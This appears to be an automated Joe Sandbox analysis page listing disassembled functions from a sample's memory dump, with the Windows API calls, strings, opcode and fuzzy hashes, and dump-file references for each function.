Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: wait
API String ID: 130734711-2112783333
Opcode ID: cfdc58c5c1d86d38e6d197e4285b4617dd04a7951504c16df2b135ed9e56d378
Instruction ID: ab10cf76678df420bd5cb944e17acc7e6ec8049d2c95b5e58abc3f8164135dbe
Opcode Fuzzy Hash: cfdc58c5c1d86d38e6d197e4285b4617dd04a7951504c16df2b135ed9e56d378
Instruction Fuzzy Hash: D5915D32205B4086FB6B8B27E8947EA27A1F74DBE4F544116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400381C1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Strings

Parameter #1 invalid., xrefs: 0000000140038A45

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: f3a0084907fdf496f6069cdcab8dedb9c6cda81da478f81307276f8b9a81688b
Instruction ID: 5f917e5f9eed0118f4772fe798e01b4792cc4cdb735169b72913a342033e3a12
Opcode Fuzzy Hash: f3a0084907fdf496f6069cdcab8dedb9c6cda81da478f81307276f8b9a81688b
Instruction Fuzzy Hash: 97916032205B4486FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400389EB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Strings

Parameter #1 invalid., xrefs: 0000000140038A45

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: 69066ea0afccdf161f2a4a6e1e8d20877589cff7d5846ff4fab92852a39cd617
Instruction ID: 81503c843bda96a4a9b9690e1a14783a1a6a37368d814f393435404b700c874b
Opcode Fuzzy Hash: 69066ea0afccdf161f2a4a6e1e8d20877589cff7d5846ff4fab92852a39cd617
Instruction Fuzzy Hash: B6916E32604B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038A34 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Strings

Parameter #1 invalid., xrefs: 0000000140038A45

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: cccc8919cd833b724c0b4bb460faf1aed356b64bf518494188e299f36ff91e03
Instruction ID: 27f0d2b2536f7ae8327940aefa12de3b2ef7e62cf4e921e1a03cfba8d8569a96
Opcode Fuzzy Hash: cccc8919cd833b724c0b4bb460faf1aed356b64bf518494188e299f36ff91e03
Instruction Fuzzy Hash: 1F916032604B4086FB6B8B27E8847DA77A1F74DBE4F540116EB59876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400380DD Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400CA91C: _errno.LIBCMT ref: 00000001400CA934
Part of subcall function 00000001400CA91C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CA93F

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Strings

Play, xrefs: 00000001400380DD

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: Play
API String ID: 130734711-4273697156
Opcode ID: 3d6cd329b5d4322a4f63678cd0b51bf45b303f297bea6bf5f16e109594ff221e
Instruction ID: 12851c55ac5caea8c166e50b30e0f281397511af0dbbc2a0359b1dc76102153b
Opcode Fuzzy Hash: 3d6cd329b5d4322a4f63678cd0b51bf45b303f297bea6bf5f16e109594ff221e
Instruction Fuzzy Hash: A9915F32605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5A876F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035780 Relevance: 12.3, APIs: 8, Instructions: 256windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
CharLowerW.USER32 ref: 0000000140035852
CharUpperW.USER32 ref: 000000014003585A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CharCountTick$ClipboardCloseGlobalLowerMessagePeekUnlockUpper
String ID:
API String ID: 1737845391-0
Opcode ID: 7362d222cebdd38f2d739f5e234c45a54e2baa680bd3fd5f9060ea79a78f9d1d
Instruction ID: f2c7ba8a3fb529d5529facef342be71f7b36f03593b8a07a970d59670173accf
Opcode Fuzzy Hash: 7362d222cebdd38f2d739f5e234c45a54e2baa680bd3fd5f9060ea79a78f9d1d
Instruction Fuzzy Hash: 78C19C32604B4486FB6B9B27E8443EA37A1F74DBE4F584116EB99476F5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037E5F Relevance: 12.2, APIs: 8, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
IsWindow.USER32 ref: 0000000140037E6B
DestroyWindow.USER32 ref: 0000000140037E7C

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseDestroyGlobalMessagePeekUnlock
String ID:
API String ID: 2997888913-0
Opcode ID: 0ec8b069243763e48540ff6d3ddca3c90bbe2c12598bf9879c82c20d765e755a
Instruction ID: 30a4810449e38f64f4e3e02c81c1029f1459c2517becafd056da4f243c70b8c5
Opcode Fuzzy Hash: 0ec8b069243763e48540ff6d3ddca3c90bbe2c12598bf9879c82c20d765e755a
Instruction Fuzzy Hash: 33916131205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5A87AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033174 Relevance: 10.8, APIs: 7, Instructions: 260clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
GetCPInfo.KERNEL32 ref: 00000001400331C0

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ClipboardCloseCountGlobalInfoTickUnlock
String ID:
API String ID: 3668674636-0
Opcode ID: d24e3bf629f89a62b0214e498b40238a0b917bdde64c829970bf3bb5b7d05730
Instruction ID: c3c03c921349736552ea586482c5f0f1521cba1a049343202ca1b2e1d80cf69a
Opcode Fuzzy Hash: d24e3bf629f89a62b0214e498b40238a0b917bdde64c829970bf3bb5b7d05730
Instruction Fuzzy Hash: 5ED15C72605B8089EB778F26E8807DA37A1F74DBA4F144216EB594BBF4DB38C581C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002E63C Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 245COMMON

Download Yara Rule

Strings

_$#@, xrefs: 000000014002E64E
variable, xrefs: 000000014002E673
Out of memory., xrefs: 000000014002E9B7
The following %s name contains an illegal character:"%-1.300s", xrefs: 000000014002E67A
ErrorLevel, xrefs: 000000014002E6EB
Illegal parameter name., xrefs: 000000014002E785

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ErrorLevel$Illegal parameter name.$Out of memory.$The following %s name contains an illegal character:"%-1.300s"$_$#@$variable
API String ID: 0-1002950332
Opcode ID: 71cb25ac8e0d07c7e2bdc0be22cf78a25a7776a512e7910d2d350893a54fc722
Instruction ID: 056f9b7a8832be69c6e7cb07896756fe6756976e83625657fda0af2b626d2206
Opcode Fuzzy Hash: 71cb25ac8e0d07c7e2bdc0be22cf78a25a7776a512e7910d2d350893a54fc722
Instruction Fuzzy Hash: 20C18D32245BC586EBA69B16E0803E973A5F78C7C4F54011AEB8D07BB9DF39C895C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003340D Relevance: 10.7, APIs: 7, Instructions: 230registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
RegCloseKey.ADVAPI32 ref: 00000001400334B4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
String ID:
API String ID: 4107439908-0
Opcode ID: a461ee21d68325edf7a4b14607d5073baa93315347f6983b7060975a5149e5e1
Instruction ID: 9bb7ca58932839f51475ddd3aab94a5c8fd56fcf4854f063fb8b95d62f0a2c78
Opcode Fuzzy Hash: a461ee21d68325edf7a4b14607d5073baa93315347f6983b7060975a5149e5e1
Instruction Fuzzy Hash: 72B16D36605B448AEB678B27E8847EA77A1F74DBD4F140116EB9D87BB4DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038804 Relevance: 10.7, APIs: 7, Instructions: 217registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
RegCloseKey.ADVAPI32 ref: 00000001400387F5

Part of subcall function 00000001400A9D20: RegCreateKeyExW.ADVAPI32 ref: 00000001400A9D9C
Part of subcall function 00000001400A9D20: RegCloseKey.ADVAPI32 ref: 00000001400AA075
Part of subcall function 00000001400A9D20: GetLastError.KERNEL32 ref: 00000001400AA084

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Close$CountTick$ClipboardCreateErrorGlobalLastMessagePeekUnlock
String ID:
API String ID: 2674141723-0
Opcode ID: fcea701a1957fe7c7010537808d3662c79a156260bb55be193bce92fc611b973
Instruction ID: 7f206223a661d7a85bfb56804f1888599b093f127f3440b3130ea2e55cc67d7f
Opcode Fuzzy Hash: fcea701a1957fe7c7010537808d3662c79a156260bb55be193bce92fc611b973
Instruction Fuzzy Hash: 90B14D32605B4486FB6BCB27E8847EA77A1F74DBD4F540116EB9947AB9DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038762 Relevance: 10.7, APIs: 7, Instructions: 203registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
RegCloseKey.ADVAPI32 ref: 00000001400387F5

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
String ID:
API String ID: 4107439908-0
Opcode ID: eceef102e2ca60857718fac67bce977996b07f4fbd745a187c864f40c563aa4e
Instruction ID: 9872727d16a03451064848ceb9ca5c6d58e50eaaaf82b6aed878ceef501e29ae
Opcode Fuzzy Hash: eceef102e2ca60857718fac67bce977996b07f4fbd745a187c864f40c563aa4e
Instruction Fuzzy Hash: F3A15D72205B4486FB6BCB27E8847EA67A1F74DBD4F540116EB5A47AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400377A5 Relevance: 10.7, APIs: 7, Instructions: 198filewindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
MoveFileW.KERNEL32 ref: 00000001400377C8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseFileGlobalMessageMovePeekUnlock
String ID:
API String ID: 1818255640-0
Opcode ID: a6cbc0eff7417ac01470f089435bda35d8cb5ab2894254fcb0973e824d035bcf
Instruction ID: e23ce32d42853de8d197fab344af6d4f882fbea69d67ea34d8bba0c7916b609b
Opcode Fuzzy Hash: a6cbc0eff7417ac01470f089435bda35d8cb5ab2894254fcb0973e824d035bcf
Instruction Fuzzy Hash: 5CA16F32205B4086FB6B8B27E8847EA27A1F74DBE4F544116FB5987AF5DB38C881C741

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003759B Relevance: 10.7, APIs: 7, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
Beep.KERNEL32 ref: 00000001400375F2

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$BeepClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 3141429382-0
Opcode ID: dd3dde60f13e2d7f02c71776e28cf44a38452c7338ed441e844b31b158028cd0
Instruction ID: 7a429a65e8c7923891d787b0ede226120a73609ed7bce8550b8ab0b42f6debdf
Opcode Fuzzy Hash: dd3dde60f13e2d7f02c71776e28cf44a38452c7338ed441e844b31b158028cd0
Instruction Fuzzy Hash: F2918032604B4486FB6B8B27E8447EA77A1F74DBE4F540116EB5A87AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036CE8 Relevance: 10.7, APIs: 7, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140067BB0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,0000000140048AE2), ref: 0000000140067BE3
Part of subcall function 0000000140067BB0: IsWindowVisible.USER32 ref: 0000000140067C04

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
SetWindowTextW.USER32 ref: 0000000140036D16

Memory Dump Source

